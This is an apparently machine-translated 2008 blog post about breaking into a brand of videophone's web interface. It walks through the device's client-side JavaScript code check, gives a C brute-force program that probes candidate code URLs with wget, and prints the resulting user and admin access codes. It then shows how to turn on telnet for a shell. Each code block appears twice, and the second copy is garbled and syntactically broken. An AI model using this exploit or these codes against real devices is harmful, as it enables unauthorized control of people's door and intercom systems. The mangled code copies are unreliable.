Hacking of videophones (2)

Priam http://192.168.1.2:8080/ your browser to a login page and you will see very skinny, probably the web interface is made for debugging and used only by insiders (and us! )

A page appears with a numeric keypad on which we should enter a code to get access

At first sight does not give me the impression of maximum security.

How it works

Giving a look at the sources we understand that every time we press a button with a JavaScript function is invoked figure Enter_code ()

 24 var code = 0 var mul = 1 var digit = 0 var fails = 0 function Enter_code ( number ) { code = code * 10 + number mul = mul * number document. codepad . thecode . value = code digit ++ if ( digit == 8 ) { if ( mul == 40320 ) { location = code + ".html" } if ( mul == 11907 ) { location = "Admin" + code + ".html" } else { fails ++ code = 0 mul = 1 digit = 0 if ( fails < 3 ) { if ( fails == 1 ) { document. codepad . thecode . value = "Try again" } if ( fails == 2 ) { document. codepad . thecode . value = "Last Time" } } else { location = "http://www.urmet.it" document. codepad . thecode . value = "Bye!" } } } } usermulcode var = 24 var code = 0 mul = 1 var var var digit = 0 fails = 0 Enter_code function (number) (code = code * 10 + number mul = mul * number document. codepad. thecode. value = code digit + + if (digit == 8) (if (mul == 40320) (+ location = code. "html") if (mul == 11907) (location = "Admin" + + code. "html") else (fails + + code = 0 mul = 1 digit = 0 if (fails <3) (if (fails == 1) (document. codepad. thecode. Value = "Try again") if (fails == 2) (document. codepad. thecode. value = "Last Time")) else (location = "http://www.urmet.it" document. codepad. thecode. value = "Bye!"))))

Looking at the code we give us an idea of the operation. After that `We have 3 attempts will be redirected to the website of Urmet. The code to enter is 8 digits long, we can access with two codes, one gives us access to another administrator and normal user. The url that opens enter the correct code is formed by the same code so if you do not know the code does not know what it is. Applying a mathematical function on his digits as a result of `user access to 40,320 and 11,907 as administrator.

How to enter

Another thing we can tell from JavaScript is that the calculation of the Code considers digits dialed on the keypad but not the order they are typed and then there are more codes that allow access but only one is right one, with all other server we respond with an error 404 (page not found.)

 user_access , admin_access , n_digits ; char ip [ 256 ] , * sCode ; int finded_user = 0 , finded_admin = 0 ; long calcola_mul ( int * digits ) { int i , code = 0 ; long mul = 1 ; for ( i = 0 ; i < n_digits ; i ++ ) { code = code * 10 + digits [ i ] ; mul = mul * digits [ i ] ; } return mul ; } void stampav ( int * digits ) { int i ; for ( i = 0 ; i < n_digits ; i ++ ) printf ( "%d " , digits [ i ] ) ; printf ( "n" ) ; } char * stampaCode ( int * digits ) { int i ; for ( i = 0 ; i < n_digits ; i ++ ) sCode [ i ] = digits [ i ] + '0' ; return sCode ; } void backtrack ( int * v , int i ) { long mul ; int c ; char cmd [ 256 ] ; if ( i >= n_digits ) { /* fine della ricorsione */ mul = calcola_mul ( v ) ; if ( finded_user == 0 && mul == user_access ) { sprintf ( cmd , "wget -q -O - http://%s/%s.html > /dev/null" , ip , stampaCode ( v ) ) ; if ( system ( cmd ) == 0 ) { printf ( "User access code: " ) ; stampav ( v ) ; finded_user = 1 ; } return ; } if ( finded_admin == 0 && mul == admin_access ) { sprintf ( cmd , "wget -q -O - http://%s/Admin%s.html > /dev/null" , ip , stampaCode ( v ) ) ; if ( system ( cmd ) == 0 ) { printf ( "Admin access code: " ) ; stampav ( v ) ; finded_admin = 1 ; } return ; } return ; } for ( c = 1 ; c <= 9 ; c ++ ) { if ( finded_admin && finded_user ) return ; v [ i ] = c ; backtrack ( v , i + 1 ) ; } } int main ( int argc , char * argv [ ] ) { int * digits ; if ( argc != 4 && argc != 5 ) { printf ( "Usage: %s <ip[:port]> <number_digits> <user_code> [<admin_code>]n" , argv [ 0 ] ) ; return 1 ; } strcpy ( ip , argv [ 1 ] ) ; n_digits = atoi ( argv [ 2 ] ) ; user_access = atoi ( argv [ 3 ] ) ; if ( argc == 5 ) admin_access = atoi ( argv [ 4 ] ) ; else finded_admin = 1 ; digits = ( int * ) malloc ( n_digits * sizeof ( int ) ) ; sCode = ( char * ) malloc ( n_digits * sizeof ( char ) ) ; backtrack ( digits , 0 ) ; free ( digits ) ; free ( sCode ) ; return 0 ; } <stdio.h> # Include # include # include <stdlib.h> <string.h> int user_access, admin_access, n_digits; char ip [256] * sCode; finded_user int = 0, finded_admin = 0; long calcola_mul (int * digits) (int i, code = 0; long mul = 1; for (i = 0; i <n_digits; i + +) (queues = queues * 10 + digits [i]; mul = mul * digits [i] ;) return mul;) void Stampavie (int * digits) (int i; for (i = 0; i <n_digits; i + +) printf ("% d", digits [i]) printf ("n") ;) stampaCode char * (int * digits) (int i; for (i = 0; i <n_digits; i + +) sCode [i] = digits [i] + '0 '; sCode return;) void backtrack (int * v, int i) (long mul, int c, char cmd [256] if (i> = n_digits) (/ * end of recursion * / mul = calcola_mul (v) if (finded_user == 0 & & multi = = user_access) (sprintf (cmd, "wget-q-O - http://% s /% s.html> / dev / null", ip, stampaCode (v)) if (system (cmd) == 0 ) (printf ("User Access Code"); Stampavie (v); finded_user = 1;) return;) if (finded_admin == 0 & & == admin_access mul) (sprintf (cmd, "wget-q-O - http : / /% s /% s.html Admin> / dev / NULL, ip, stampaCode (v)) if (system (cmd) == 0) printf (("Admin Access Code:"); Stampavie (v ) finded_admin = 1;) return;) return;) for (c = 1 c <= 9, c + +) (if (finded_admin & & finded_user) return; v [i] = c; backtrack (v, i + 1);)) int main (int argc, char * argv []) (int * digits if (argc! = 4 & & argc! = 5) (printf ("Usage:% s <ip[:port]> < number_digits> <user_code> [<admin_code>] n ", argv [0]) return 1;) strcpy (ip, argv [1]); n_digits = atoi (argv [2]); user_access = atoi (argv [3 ]) if (argc == 5) admin_access = atoi (argv [4]); else finded_admin = 1, digits = (int *) malloc (n_digits * sizeof (int)); sCode = (char *) malloc (n_digits * sizeof (char)); backtrack (digits, 0); free (digits); free (sCode) return 0;)

After completing the program can run and print the codes to access video.
$ ./access 192.168.1.2:8080 8 40320 11907 User access code: 1 2 3 4 5 6 7 8 Admin access code: 1 9 7 1 1 3 9 7
The phones should be all the same then these codes should allow access to everyone. I also tried another phone with a different software version, in that case, the digits were 10 instead of 8 and there was only the administrator user, in that case the code was 1 9 7 1 1 3 9 7 2 7.

We are inside

Now we can change the configuration of the phone at will.
From the web click on "System Information" and then click again on "Optional Net Services", so the phone will start a telnet server that we can simply connect with the command
telnet 192.168.1.2 23 resulting in a beautiful shell.

Have fun.

November 28, 2008 • Tags: GNU / Linux , Hacking , How To • Posted in: ANSI C , Computer , JavaScript , Programming

Ideas, experiments, trials and much more

Home
Log in

Hacking of videophones (2)

How it works

How to enter

We are inside

Leave a Reply

Choose your language

Sections

Categories

Recommended Sites

Aggregators

Ideas, experiments, trials and much more

Home Log in

Hacking of videophones (2)

How it works

How to enter

We are inside

Leave a Reply

Choose your language

Sections

Categories

Recommended Sites

Aggregators

Home
Log in